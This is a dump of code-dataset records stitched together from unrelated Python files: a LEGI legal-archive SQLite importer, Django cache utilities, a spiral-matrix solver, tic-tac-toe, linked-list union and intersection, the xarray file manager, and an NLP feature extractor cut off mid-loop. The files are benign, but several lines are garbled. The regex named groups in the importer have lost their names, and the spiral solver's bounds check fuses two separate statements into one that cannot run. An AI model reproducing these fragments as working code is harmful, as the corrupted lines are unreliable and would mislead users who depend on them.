to_dict=True)\n data = {table: prev_row_dict}\n data['liens'] = db.list(\"\"\"\n SELECT *\n FROM liens\n WHERE src_id = ? AND NOT _reversed\n OR dst_id = ? AND _reversed\n \"\"\", (row_id, row_id), to_dict=True)\n if table == 'sections':\n data['sommaires'] = db.list(\"\"\"\n SELECT *\n FROM sommaires\n WHERE cid = ?\n AND parent = ?\n AND _source = 'section_ta_liens'\n \"\"\", (row_id, row_id), to_dict=True)\n elif table == 'textes_structs':\n source = 'struct/' + row_id\n data['sommaires'] = db.list(\"\"\"\n SELECT *\n FROM sommaires\n WHERE cid = ?\n AND _source = ?\n \"\"\", (row_cid, source), to_dict=True)\n data = {k: v for k, v in data.items() if v}\n insert('duplicate_files', {\n 'id': row_id,\n 'sous_dossier': SOUS_DOSSIER_MAP[table],\n 'cid': prev_cid,\n 'dossier': prev_dossier,\n 'mtime': prev_mtime,\n 'data': json.dumps(data),\n 'other_cid': row_cid,\n 'other_dossier': dossier,\n 'other_mtime': mtime,\n }, replace=True)\n counts['upsert into duplicate_files'] += 1\n elif prev_mtime == mtime:\n skipped += 1\n continue\n\n xml.feed(b''.join(entry.get_blocks()))\n root = xml.close()\n tag = root.tag\n meta = root.find('META')\n\n # Check the ID\n if tag == 'SECTION_TA':\n assert root.find('ID').text == row_id\n else:\n meta_commun = meta.find('META_COMMUN')\n assert meta_commun.find('ID').text == row_id\n nature = meta_commun.find('NATURE').text\n\n # Extract the data we want\n attrs = {}\n liens = ()\n sommaires = ()\n if tag == 'ARTICLE':\n assert nature == 'Article'\n assert table == 'articles'\n contexte = root.find('CONTEXTE/TEXTE')\n assert attr(contexte, 'cid') == row_cid\n sections = contexte.findall('.//TITRE_TM')\n if sections:\n attrs['section'] = attr(sections[-1], 'id')\n meta_article = meta.find('META_SPEC/META_ARTICLE')\n scrape_tags(attrs, meta_article, META_ARTICLE_TAGS)\n scrape_tags(attrs, root, ARTICLE_TAGS, unwrap=True, clean=True)\n elif tag == 'SECTION_TA':\n assert table == 'sections'\n scrape_tags(attrs, root, SECTION_TA_TAGS)\n section_id = row_id\n contexte = root.find('CONTEXTE/TEXTE')\n assert attr(contexte, 'cid') == row_cid\n parents = contexte.findall('.//TITRE_TM')\n if parents:\n attrs['parent'] = attr(parents[-1], 'id')\n sommaires = [\n {\n 'cid': row_cid,\n 'parent': section_id,\n 'element': attr(lien, 'id'),\n 'debut': attr(lien, 'debut'),\n 'fin': attr(lien, 'fin'),\n 'etat': attr(lien, 'etat'),\n 'num': attr(lien, 'num'),\n 'position': i,\n '_source': 'section_ta_liens',\n }\n for i, lien in enumerate(root.find('STRUCTURE_TA'))\n ]\n elif tag == 'TEXTELR':\n assert table == 'textes_structs'\n scrape_tags(attrs, root, TEXTELR_TAGS)\n sommaires = [\n {\n 'cid': row_cid,\n 'element': attr(lien, 'id'),\n 'debut': attr(lien, 'debut'),\n 'fin': attr(lien, 'fin'),\n 'etat': attr(lien, 'etat'),\n 'position': i,\n '_source': 'struct/' + row_id,\n }\n for i, lien in enumerate(root.find('STRUCT'))\n ]\n elif tag == 'TEXTE_VERSION':\n assert table == 'textes_versions'\n attrs['nature'] = nature\n meta_spec = meta.find('META_SPEC')\n meta_chronicle = meta_spec.find('META_TEXTE_CHRONICLE')\n assert meta_chronicle.find('CID').text == row_cid\n scrape_tags(attrs, meta_chronicle, META_CHRONICLE_TAGS)\n meta_version = meta_spec.find('META_TEXTE_VERSION')\n scrape_tags(attrs, meta_version, META_VERSION_TAGS)\n scrape_tags(attrs, root, TEXTE_VERSION_TAGS, unwrap=True, clean=True)\n else:\n raise Exception('unexpected tag: '+tag)\n\n if process_links and tag in ('ARTICLE', 'TEXTE_VERSION'):\n e = root if tag == 'ARTICLE' else meta_version\n liens_tags = e.find('LIENS')\n if liens_tags is not None:\n liens = []\n for lien in liens_tags:\n typelien, sens = attr(lien, 'typelien'), attr(lien, 'sens')\n src_id, dst_id = row_id, attr(lien, 'id')\n if sens == 'cible':\n assert dst_id\n src_id, dst_id = dst_id, src_id\n dst_cid = dst_titre = ''\n typelien = TYPELIEN_MAP.get(typelien, typelien+'_R')\n _reversed = True\n else:\n dst_cid = attr(lien, 'cidtexte')\n dst_titre = lien.text\n _reversed = False\n liens.append({\n 'src_id': src_id,\n 'dst_cid': dst_cid,\n 'dst_id': dst_id,\n 'dst_titre': dst_titre,\n 'typelien': typelien,\n '_reversed': _reversed,\n })\n\n if duplicate:\n data = {table: attrs}\n if liens:\n data['liens'] = liens\n if sommaires:\n data['sommaires'] = sommaires\n insert('duplicate_files', {\n 'id': row_id,\n 'sous_dossier': SOUS_DOSSIER_MAP[table],\n 'cid': row_cid,\n 'dossier': dossier,\n 'mtime': mtime,\n 'data': json.dumps(data),\n 'other_cid': prev_cid,\n 'other_dossier': prev_dossier,\n 'other_mtime': prev_mtime,\n }, replace=True)\n counts['upsert into duplicate_files'] += 1\n continue\n\n attrs['dossier'] = dossier\n attrs['cid'] = row_cid\n attrs['mtime'] = mtime\n\n if prev_row:\n # Delete the associated rows\n if tag == 'SECTION_TA':\n db.run(\"\"\"\n DELETE FROM sommaires\n WHERE cid = ?\n AND parent = ?\n AND _source = 'section_ta_liens'\n \"\"\", (row_cid, section_id))\n counts['delete from sommaires'] += db.changes()\n elif tag == 'TEXTELR':\n db.run(\"\"\"\n DELETE FROM sommaires\n WHERE cid = ?\n AND _source = ?\n \"\"\", (row_cid, 'struct/' + row_id))\n counts['delete from sommaires'] += db.changes()\n if tag in ('ARTICLE', 'TEXTE_VERSION'):\n db.run(\"\"\"\n DELETE FROM liens\n WHERE src_id = ? AND NOT _reversed\n OR dst_id = ? AND _reversed\n \"\"\", (row_id, row_id))\n counts['delete from liens'] += db.changes()\n if table == 'textes_versions':\n db.run(\"DELETE FROM textes_versions_brutes WHERE id = ?\", (row_id,))\n counts['delete from textes_versions_brutes'] += db.changes()\n # Update the row\n counts['update in '+table] += 1\n update(table, dict(id=row_id), attrs)\n else:\n counts['insert into '+table] += 1\n attrs['id'] = row_id\n insert(table, attrs)\n\n # Insert the associated rows\n for lien in liens:\n db.insert('liens', lien)\n counts['insert into liens'] += len(liens)\n for sommaire in sommaires:\n db.insert('sommaires', sommaire)\n counts['insert into sommaires'] += len(sommaires)\n\n # Update the progress bar\n pbar.update(file.tell() - pbar.n)\n\n print(\"made\", sum(counts.values()), \"changes in the database:\",\n json.dumps(counts, indent=4, sort_keys=True))\n\n if skipped:\n print(\"skipped\", skipped, \"files that haven't changed\")\n\n if unknown_folders:\n for d, x in unknown_folders.items():\n print(\"skipped\", x, \"files in unknown folder `%s`\" % d)\n\n if liste_suppression:\n suppress(get_table, db, liste_suppression)\n\n if not raw:\n remove_detected_soft_hyphens(db, soft_hyphens)\n\n\ndef main():\n p = ArgumentParser()\n p.add_argument('db')\n p.add_argument('directory')\n p.add_argument('--anomalies', action='store_true', default=False,\n help=\"detect anomalies after each processed archive\")\n p.add_argument('--anomalies-dir', default='.')\n p.add_argument('--pragma', action='append', default=[],\n help=\"Doc: https://www.sqlite.org/pragma.html | Example: journal_mode=WAL\")\n p.add_argument('--raw', default=False, action='store_true')\n p.add_argument('--skip-checks', default=False, action='store_true',\n help=\"skip the HTML cleaning checks\")\n p.add_argument('--skip-links', default=False, action='store_true',\n help=\"ignore all link metadata (the `liens` table will be empty)\")\n args = p.parse_args()\n\n if not os.path.isdir(args.anomalies_dir):\n os.mkdir(args.anomalies_dir)\n\n db = connect_db(args.db, pragmas=args.pragma)\n last_update = db.one(\"SELECT value FROM db_meta WHERE key = 'last_update'\")\n\n # Check and record the data mode\n db_meta_raw = db.one(\"SELECT value FROM db_meta WHERE key = 'raw'\")\n if args.raw:\n versions_brutes = bool(db.one(\"SELECT 1 FROM textes_versions_brutes LIMIT 1\"))\n data_is_not_raw = versions_brutes or db_meta_raw is False\n if data_is_not_raw:\n print(\"!> Can't honor --raw option, the data has already been modified previously.\")\n raise SystemExit(1)\n if db_meta_raw != args.raw:\n db.insert('db_meta', dict(key='raw', value=args.raw), replace=True)\n\n # Handle the --skip-links option\n has_links = bool(db.one(\"SELECT 1 FROM liens LIMIT 1\"))\n if not args.skip_links and not has_links and last_update is not None:\n args.skip_links = True\n print(\"> Warning: links will not be processed because this DB was built with --skip-links.\")\n elif args.skip_links and has_links:\n print(\"> Deleting links...\")\n db.run(\"DELETE FROM liens\")\n\n # Look for new archives in the given directory\n print(\"> last_update is\", last_update)\n archive_re = re.compile(r'(.+_)?legi(?P_global)?_(?P[0-9]{8}-[0-9]{6})\\..+', flags=re.IGNORECASE)\n skipped = 0\n archives = sorted([\n (m.group('date'), bool(m.group('global')), m.group(0)) for m in [\n archive_re.match(fn) for fn in os.listdir(args.directory)\n if fnmatch(fn.lower(), '*legi_*.tar.*')\n ]\n ])\n most_recent_global = [t[0] for t in archives if t[1]][-1]\n if last_update and most_recent_global > last_update:\n print(\"> There is a new global archive, recreating the DB from scratch!\")\n db.close()\n os.rename(db.address, db.address + '.back')\n db = connect_db(args.db, pragmas=args.pragma)\n archives, skipped = partition(\n archives, lambda t: t[0] >= most_recent_global and t[0] > (last_update or '')\n )\n if skipped:\n print(\"> Skipped %i old archives\" % len(skipped))\n\n # Process the new archives\n process_links = not args.skip_links\n check_html = not args.skip_checks\n for archive_date, is_global, archive_name in archives:\n print(\"> Processing %s...\" % archive_name)\n with db:\n process_archive(\n db, args.directory + '/' + archive_name, args.raw,\n process_links=process_links, check_html=check_html,\n )\n if last_update:\n db.run(\"UPDATE db_meta SET value = ? WHERE key = 'last_update'\", (archive_date,))\n else:\n db.run(\"INSERT INTO db_meta VALUES ('last_update', ?)\", (archive_date,))\n last_update = archive_date\n print('last_update is now set to', last_update)\n\n # Detect anomalies if requested\n if args.anomalies:\n fpath = args.anomalies_dir + '/anomalies-' + last_update + '.txt'\n with open(fpath, 'w') as f:\n n_anomalies = detect_anomalies(db, f)\n print(\"logged\", n_anomalies, \"anomalies in\", fpath)\n\n if not args.raw:\n from .normalize import (\n normalize_article_numbers, normalize_section_titles,\n normalize_sommaires_num, normalize_text_titles,\n )\n normalize_text_titles(db)\n normalize_section_titles(db)\n normalize_article_numbers(db)\n normalize_sommaires_num(db)\n from .factorize import main as factorize\n factorize(db)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass\n","sub_path":"legi/tar2sqlite.py","file_name":"tar2sqlite.py","file_ext":"py","file_size_in_byte":23975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"253636904","text":"from time import time\n\nfrom django.core.cache import cache\nfrom django.utils.translation import get_language\n\n\n__all__ = (\n 'get_cache_key', 'get_cache_pattern', 'invalidate', 'invalidate_object',\n)\n\n\ndef get_cache_key(method, obj, args, kwargs, id_attr='pk'):\n _id = getattr(obj, id_attr)\n if _id is None:\n return\n meta = obj._meta\n return '%s:%s.%s.%s:%s(%s,%s)' % (\n get_language(), meta.app_label, meta.model_name,\n method.__name__, _id, args, kwargs)\n\n\ndef get_obj_cache_key(obj, id_attr='pk'):\n meta = obj._meta\n return '%s.%s.%s' % (\n meta.app_label, meta.model_name, getattr(obj, id_attr))\n\n\ndef invalidate_object(obj, id_attr='pk'):\n object_cache_key = get_obj_cache_key(obj, id_attr)\n cache.set(object_cache_key, time(), None)\n","sub_path":"cache_tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"306108727","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\nimport math\nimport sys\nimport re\nimport collections\nimport itertools\nfrom functools import *\n\n\ndef solve():\n # =list(map(int,input().split()))\n # =int(input())\n\n # n =input()[2:-2].split('],[')a\n # target=int(input())\n R=int(input())\n C=int(input())\n r0=int(input())\n c0=int(input())\n res=[[r0,c0]]\n\n while True:\n for i in itertools.count(1,2):\n steps=[(0,1)]*i+[(1,0)]*i+[(0,-1)]*(i+1)+[(-1,0)]*(i+1)\n for dis_r,dis_c in steps:\n r0+=dis_r\n c0+=dis_c\n if (0<=r0=(C*R):\n print(res)\n return\n\n\nsolve()","sub_path":"Code/CodeRecords/2276/60765/293249.py","file_name":"293249.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"482713149","text":"#init_board = ['#', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']\n#curr_board = init_board\nhas_winner = False\ngame_on = True\n\n\ndef display_board(input_board):\n line_separator = '--------------------'\n horizontal_separator = ' | | '\n sign_positions = [1, 3, 5]\n vert_positions = [0, 2, 4, 6]\n for i in range(10):\n if i in vert_positions:\n print(line_separator)\n elif i in sign_positions:\n if i == 1:\n repl_string = horizontal_separator[0:2] + input_board[7] + horizontal_separator[3:]\n repl_string = repl_string[0:9] + input_board[8] + repl_string[10:]\n repl_string = repl_string[0:16] + input_board[9] + repl_string[17:]\n elif i == 3:\n repl_string = horizontal_separator[0:2] + input_board[4] + horizontal_separator[3:]\n repl_string = repl_string[0:9] + input_board[5] + repl_string[10:]\n repl_string = repl_string[0:16] + input_board[6] + repl_string[17:]\n elif i == 5:\n repl_string = horizontal_separator[0:2] + input_board[1] + horizontal_separator[3:]\n repl_string = repl_string[0:9] + input_board[2] + repl_string[10:]\n repl_string = repl_string[0:16] + input_board[3] + repl_string[17:]\n print(repl_string)\n\n\ndef clear_screen():\n print('\\n' * 100)\n\n\ndef show_board_info():\n position_board = ['#', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n print('Grid positions. Select a number to place your marker.')\n display_board(position_board)\n print('\\n####################################################\\n')\n\n\ndef player_input():\n valid_markers = ['X', 'O']\n input_string = ''\n while input_string not in valid_markers:\n input_string = input('What marker do you want? Enter X or O: ')\n return input_string\n\n\ndef choose_starter():\n import random\n if random.randint(0, 1) == 0:\n return 2\n return 1\n\n\ndef place_marker(board, marker, position):\n board[position] = marker\n return board\n\n\ndef position_check(board, position):\n if board[position] in ['X', 'O']:\n print('Hey, that spot is taken by {}. Pick another one!'.format(board[position]))\n return False\n return True\n\n\ndef calculate_win(input_board, marker):\n valid_combinations = [(1, 4, 7), (2, 5, 8), (3, 6, 9), (1, 2, 3), (4, 5, 6), (7, 8, 9), (1, 5, 9), (3, 5, 7)]\n for_the_win = False\n for valid in valid_combinations:\n if input_board[valid[0]] == marker and input_board[valid[1]] == marker and input_board[valid[2]] == marker:\n print('Looks like we have a winner. Congratulations player ' + str(input_board[valid[0]]) + '!')\n for_the_win = True\n display_board(input_board)\n break\n if ' ' not in set(input_board):\n display_board(input_board)\n print('Damn, it was a tie. No winner')\n return 'tie'\n return for_the_win\n\n\ndef replay():\n continue_play = ''\n while continue_play not in ['Y', 'N']:\n continue_play = input('Play again? Y/N')\n if continue_play == 'Y':\n return True\n elif continue_play == 'N':\n return False\n\n\nwhile game_on:\n curr_board = [' '] * 10\n p1_marker = player_input()\n p2_marker = 'O' if p1_marker == 'X' else 'X'\n starter = choose_starter()\n curr_marker = p1_marker if starter == 1 else p2_marker\n print('Player {} gets to start! Your marker is {}'.format(starter, curr_marker))\n\n while not has_winner:\n clear_screen()\n show_board_info()\n display_board(curr_board)\n next_marker = p2_marker if curr_marker == p1_marker else p1_marker\n desired_pos = input('Ok player {}, pick a free spot for your marker: '.format(curr_marker))\n valid_position = position_check(curr_board, int(desired_pos))\n if not valid_position:\n continue\n curr_board = place_marker(curr_board, curr_marker, int(desired_pos))\n game_over = calculate_win(curr_board, curr_marker)\n if game_over == 'tie':\n if not replay():\n game_on = False\n break\n else:\n has_winner = game_over\n curr_marker = next_marker\n\n if not replay():\n game_on = False\n else:\n has_winner = False\n\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"367822745","text":"# -*- coding: utf-8 -*-\r\n\r\nclass Node:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\n def __repr__(self):\r\n return str(self.value)\r\n\r\n\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def __str__(self):\r\n cur_head = self.head\r\n out_string = \"\"\r\n while cur_head:\r\n out_string += str(cur_head.value) + \" -> \"\r\n cur_head = cur_head.next\r\n return out_string\r\n\r\n\r\n def append(self, value):\r\n\r\n if self.head is None:\r\n self.head = Node(value)\r\n return\r\n\r\n node = self.head\r\n while node.next:\r\n node = node.next\r\n\r\n node.next = Node(value)\r\n\r\n def size(self):\r\n size = 0\r\n node = self.head\r\n while node:\r\n size += 1\r\n node = node.next\r\n return size\r\n \r\n def is_present(self,data):\r\n if self.head is None:\r\n return False\r\n current = self.head\r\n while current:\r\n if current.value==data:\r\n return True\r\n current=current.next\r\n return False\r\n \r\n\r\ndef union(list_1, list_2):\r\n union_list = LinkedList()\r\n \r\n node = list_1.head\r\n #traverse all nodes in list_1 and append values not already in union set.\r\n while node:\r\n union_list.append(node.value)\r\n node = node.next\r\n \r\n node = list_2.head\r\n #traverse all nodes in list_2 and append values not already in union set.\r\n while node:\r\n if union_list.is_present(node.value)==False: \r\n union_list.append(node.value)\r\n node = node.next\r\n \r\n return union_list\r\n pass\r\n\r\ndef intersection(list_1, list_2):\r\n # Your Solution Here\r\n intersection_list = LinkedList()\r\n node = list_1.head\r\n \r\n #traverse all nodes in list_1 and append values that are in list_2 set.\r\n while node:\r\n if list_2.is_present(node.value)==True:\r\n intersection_list.append(node)\r\n node = node.next\r\n \r\n return intersection_list\r\n pass\r\n\r\n\r\nprint(\"Test case 1\")\r\n\r\nlinked_list_1 = LinkedList()\r\nlinked_list_2 = LinkedList()\r\n\r\nelement_1 = [3,2,4,35,6,65,6,4,3,21]\r\nelement_2 = [6,32,4,9,6,1,11,21,1]\r\n\r\nfor i in element_1:\r\n if linked_list_1.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_1.append(i)\r\n\r\nfor i in element_2:\r\n if linked_list_2.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_2.append(i)\r\n\r\nprint (union(linked_list_1,linked_list_2)) #prints all the values in both the lists without duplicates\r\nprint (intersection(linked_list_1,linked_list_2)) #prints 4 , 6 , 21 as their intersection\r\n\r\nprint(\"Test case 2\")\r\n\r\nlinked_list_3 = LinkedList()\r\nlinked_list_4 = LinkedList()\r\n\r\nelement_1 = [3,2,4,35,6,65,6,4,3,23]\r\nelement_2 = [1,7,8,9,11,21,1]\r\n\r\nfor i in element_1:\r\n if linked_list_3.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_3.append(i)\r\n\r\nfor i in element_2:\r\n if linked_list_4.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_4.append(i)\r\n\r\n\r\nprint (union(linked_list_3,linked_list_4)) #prints all the values in both the lists without duplicates\r\n\r\nprint (intersection(linked_list_3,linked_list_4)) #prints nothing as there is no intersection in the values\r\n\r\nprint(\"Test case 3\")\r\n#this test case will have same union and intersection\r\n\r\nlinked_list_5 = LinkedList()\r\nlinked_list_6 = LinkedList()\r\n\r\nelement_1 = [1,7,8,9,11,21,1]\r\nelement_2 = [1,7,8,9,11,21,1]\r\n\r\nfor i in element_1:\r\n if linked_list_5.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_5.append(i)\r\n\r\nfor i in element_2:\r\n if linked_list_6.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_6.append(i)\r\n\r\n\r\nprint (union(linked_list_5,linked_list_6)) #prints all the values in a list as both the list are same\r\n\r\nprint (intersection(linked_list_5,linked_list_6)) #prints all the values in a list as both the list are same\r\n","sub_path":"P1/Problem_6.py","file_name":"Problem_6.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"645427894","text":"import threading\n\nfrom ..core import utils\nfrom ..core.options import OPTIONS\nfrom .lru_cache import LRUCache\n\n\n# Global cache for storing open files.\nFILE_CACHE = LRUCache(\n OPTIONS['file_cache_maxsize'], on_evict=lambda k, v: v.close())\nassert FILE_CACHE.maxsize, 'file cache must be at least size one'\n\n\n_DEFAULT_MODE = utils.ReprObject('')\n\n\nclass FileManager(object):\n \"\"\"Manager for acquiring and closing a file object.\n\n Use FileManager subclasses (CachingFileManager in particular) on backend\n storage classes to automatically handle issues related to keeping track of\n many open files and transferring them between multiple processes.\n \"\"\"\n\n def acquire(self):\n \"\"\"Acquire the file object from this manager.\"\"\"\n raise NotImplementedError\n\n def close(self, needs_lock=True):\n \"\"\"Close the file object associated with this manager, if needed.\"\"\"\n raise NotImplementedError\n\n\nclass CachingFileManager(FileManager):\n \"\"\"Wrapper for automatically opening and closing file objects.\n\n Unlike files, CachingFileManager objects can be safely pickled and passed\n between processes. They should be explicitly closed to release resources,\n but a per-process least-recently-used cache for open files ensures that you\n can safely create arbitrarily large numbers of FileManager objects.\n\n Don't directly close files acquired from a FileManager. Instead, call\n FileManager.close(), which ensures that closed files are removed from the\n cache as well.\n\n Example usage:\n\n manager = FileManager(open, 'example.txt', mode='w')\n f = manager.acquire()\n f.write(...)\n manager.close() # ensures file is closed\n\n Note that as long as previous files are still cached, acquiring a file\n multiple times from the same FileManager is essentially free:\n\n f1 = manager.acquire()\n f2 = manager.acquire()\n assert f1 is f2\n\n \"\"\"\n\n def __init__(self, opener, *args, **keywords):\n \"\"\"Initialize a FileManager.\n\n Parameters\n ----------\n opener : callable\n Function that when called like ``opener(*args, **kwargs)`` returns\n an open file object. The file object must implement a ``close()``\n method.\n *args\n Positional arguments for opener. A ``mode`` argument should be\n provided as a keyword argument (see below). All arguments must be\n hashable.\n mode : optional\n If provided, passed as a keyword argument to ``opener`` along with\n ``**kwargs``. ``mode='w' `` has special treatment: after the first\n call it is replaced by ``mode='a'`` in all subsequent function to\n avoid overriding the newly created file.\n kwargs : dict, optional\n Keyword arguments for opener, excluding ``mode``. All values must\n be hashable.\n lock : duck-compatible threading.Lock, optional\n Lock to use when modifying the cache inside acquire() and close().\n By default, uses a new threading.Lock() object. If set, this object\n should be pickleable.\n cache : MutableMapping, optional\n Mapping to use as a cache for open files. By default, uses xarray's\n global LRU file cache. Because ``cache`` typically points to a\n global variable and contains non-picklable file objects, an\n unpickled FileManager objects will be restored with the default\n cache.\n \"\"\"\n # TODO: replace with real keyword arguments when we drop Python 2\n # support\n mode = keywords.pop('mode', _DEFAULT_MODE)\n kwargs = keywords.pop('kwargs', None)\n lock = keywords.pop('lock', None)\n cache = keywords.pop('cache', FILE_CACHE)\n if keywords:\n raise TypeError('FileManager() got unexpected keyword arguments: '\n '%s' % list(keywords))\n\n self._opener = opener\n self._args = args\n self._mode = mode\n self._kwargs = {} if kwargs is None else dict(kwargs)\n self._default_lock = lock is None or lock is False\n self._lock = threading.Lock() if self._default_lock else lock\n self._cache = cache\n self._key = self._make_key()\n\n def _make_key(self):\n \"\"\"Make a key for caching files in the LRU cache.\"\"\"\n value = (self._opener,\n self._args,\n self._mode,\n tuple(sorted(self._kwargs.items())))\n return _HashedSequence(value)\n\n def acquire(self):\n \"\"\"Acquiring a file object from the manager.\n\n A new file is only opened if it has expired from the\n least-recently-used cache.\n\n This method uses a reentrant lock, which ensures that it is\n thread-safe. You can safely acquire a file in multiple threads at the\n same time, as long as the underlying file object is thread-safe.\n\n Returns\n -------\n An open file object, as returned by ``opener(*args, **kwargs)``.\n \"\"\"\n with self._lock:\n try:\n file = self._cache[self._key]\n except KeyError:\n kwargs = self._kwargs\n if self._mode is not _DEFAULT_MODE:\n kwargs = kwargs.copy()\n kwargs['mode'] = self._mode\n file = self._opener(*self._args, **kwargs)\n if self._mode == 'w':\n # ensure file doesn't get overriden when opened again\n self._mode = 'a'\n self._key = self._make_key()\n self._cache[self._key] = file\n return file\n\n def _close(self):\n default = None\n file = self._cache.pop(self._key, default)\n if file is not None:\n file.close()\n\n def close(self, needs_lock=True):\n \"\"\"Explicitly close any associated file object (if necessary).\"\"\"\n # TODO: remove needs_lock if/when we have a reentrant lock in\n # dask.distributed: https://github.com/dask/dask/issues/3832\n if needs_lock:\n with self._lock:\n self._close()\n else:\n self._close()\n\n def __getstate__(self):\n \"\"\"State for pickling.\"\"\"\n lock = None if self._default_lock else self._lock\n return (self._opener, self._args, self._mode, self._kwargs, lock)\n\n def __setstate__(self, state):\n \"\"\"Restore from a pickle.\"\"\"\n opener, args, mode, kwargs, lock = state\n self.__init__(opener, *args, mode=mode, kwargs=kwargs, lock=lock)\n\n\nclass _HashedSequence(list):\n \"\"\"Speedup repeated look-ups by caching hash values.\n\n Based on what Python uses internally in functools.lru_cache.\n\n Python doesn't perform this optimization automatically:\n https://bugs.python.org/issue1462796\n \"\"\"\n\n def __init__(self, tuple_value):\n self[:] = tuple_value\n self.hashvalue = hash(tuple_value)\n\n def __hash__(self):\n return self.hashvalue\n\n\nclass DummyFileManager(FileManager):\n \"\"\"FileManager that simply wraps an open file in the FileManager interface.\n \"\"\"\n def __init__(self, value):\n self._value = value\n\n def acquire(self):\n return self._value\n\n def close(self, needs_lock=True):\n del needs_lock # ignored\n self._value.close()\n","sub_path":"xarray/backends/file_manager.py","file_name":"file_manager.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"424657573","text":"import numpy as np\r\nimport sys\r\nimport argparse\r\nimport os\r\nimport json\r\nimport string\r\nimport csv\r\n\r\n\r\ndef load_vars():\r\n first_p_prn = ['I', 'me', 'my', 'mine', 'we', 'us', 'our', 'ours']\r\n second_p_prn = ['you', 'your', 'yours', 'u', 'ur', 'urs']\r\n third_p_prn = ['he', 'him', 'his', 'she', 'her', 'hers', 'it', 'its', 'they', 'them', 'their', 'theirs']\r\n future_vb = [\"'ll\", \"will\", \"gonna\"]\r\n slang_ac = ['smh', 'fwb', 'lmfao', 'lmao', 'lms', 'tbh', 'rofl', 'wtf', 'bff', 'wyd', 'lylc', 'brb', 'atm', 'imao',\r\n 'sml', 'btw',\r\n 'bw', 'imho', 'fyi', 'ppl', 'sob', 'ttyl', 'imo', 'ltr', 'thx', 'kk', 'omg', 'omfg', 'ttys', 'afn',\r\n 'bbs', 'cya', 'ez', 'f2f',\r\n 'gtr', 'ic', 'jk', 'k', 'ly', 'ya', 'nm', 'np', 'plz', 'ru', 'so', 'tc', 'tmi', 'ym', 'ur', 'u', 'sol',\r\n 'fml']\r\n\r\n with open('Conjunct') as conjunct:\r\n ccs = conjunct.read()\r\n with open('femaleFirstNames.txt') as f_first_names:\r\n f_f_names = f_first_names.read()\r\n with open('lastNames.txt') as last_names:\r\n l_names = last_names.read()\r\n with open('maleFirstNames.txt') as m_first_names:\r\n m_f_names = m_first_names.read()\r\n\r\n bg_norms = {}\r\n fst_line = True\r\n with open('BristolNorms+GilhoolyLogie.csv') as bg_norms_file:\r\n bg_reader = csv.reader(bg_norms_file, delimiter=',')\r\n for row in bg_reader:\r\n if fst_line:\r\n fst_line = False\r\n continue\r\n bg_norms[row[1]] = row[3:6]\r\n\r\n w_norms = {}\r\n first_line = True\r\n with open('Ratings_Warriner_et_al.csv') as w_norms_file:\r\n w_reader = csv.reader(w_norms_file, delimiter=',')\r\n for row in w_reader:\r\n if first_line:\r\n first_line = False\r\n continue\r\n w_norms[row[1]] = [row[2]] + [row[5]] + [row[8]]\r\n\r\n return first_p_prn, second_p_prn, third_p_prn, future_vb, slang_ac, ccs, f_f_names, l_names, m_f_names, bg_norms, w_norms\r\n\r\n\r\ndef extract1( comment ):\r\n ''' This function extracts features from a single comment\r\n\r\n Parameters:\r\n comment : string, the body of a comment (after preprocessing)\r\n\r\n Returns:\r\n feats : numpy Array, a 173-length vector of floating point features (only the first 29 are expected to be filled, here)\r\n '''\r\n\r\n feats = np.zeros(30)\r\n\r\n # load lists and dicts used to check features\r\n first_p_prn, second_p_prn, third_p_prn, future_vb, slang_ac, ccs, f_f_names, l_names, m_f_names, bg_norms, w_norms = load_vars()\r\n\r\n first_pp = 0\r\n second_pp = 0\r\n third_pp = 0\r\n cc = 0\r\n past_vb = 0 #initialize features\r\n fut_vb = 0\r\n commas = 0\r\n c_nouns = 0\r\n p_nouns = 0\r\n adverbs = 0\r\n wh = 0\r\n slang = 0\r\n upper = 0\r\n total_token_length = 0\r\n punc = 0\r\n multipunc = 0\r\n nine11 = 0\r\n eos = comment.count(\"\\n\") # count sentences\r\n\r\n t_AoA = 0\r\n t_IMG = 0\r\n t_FAM = 0\r\n numb_bg = 0\r\n # initialize variables for norms\r\n AoA_list = []\r\n IMG_list = []\r\n FAM_list = []\r\n\r\n t_vms = 0\r\n t_ams = 0\r\n t_dms = 0\r\n num_w = 0\r\n\r\n vms_list = []\r\n ams_list = []\r\n dms_list = []\r\n\r\n\r\n\r\n\r\n for token in comment.split():\r\n if \"/\" in token and len(token.split(\"/\")) == 2: #split tokens into word and tag\r\n word, tag = token.split(\"/\")\r\n else:\r\n splitted = token.split(\"/\") #deal with words containing / like 9/11\r\n word = '/'.join(splitted[:-1])\r\n tag = splitted[-1]\r\n\r\n if word in first_p_prn:\r\n first_pp += 1\r\n if word in second_p_prn:\r\n second_pp += 1\r\n if word in third_p_prn:\r\n third_pp += 1\r\n if tag == 'cc' or word in ccs:\r\n cc += 1 #check each word for presence of features and increment\r\n if tag == 'vbd' or tag == 'vbn': #feature variables\r\n past_vb += 1\r\n if word in future_vb:\r\n fut_vb += 1\r\n if word == ',':\r\n commas += 1\r\n if word[0] in string.punctuation and word[-1] in string.punctuation and len(word) > 1:\r\n multipunc += 1\r\n if word == 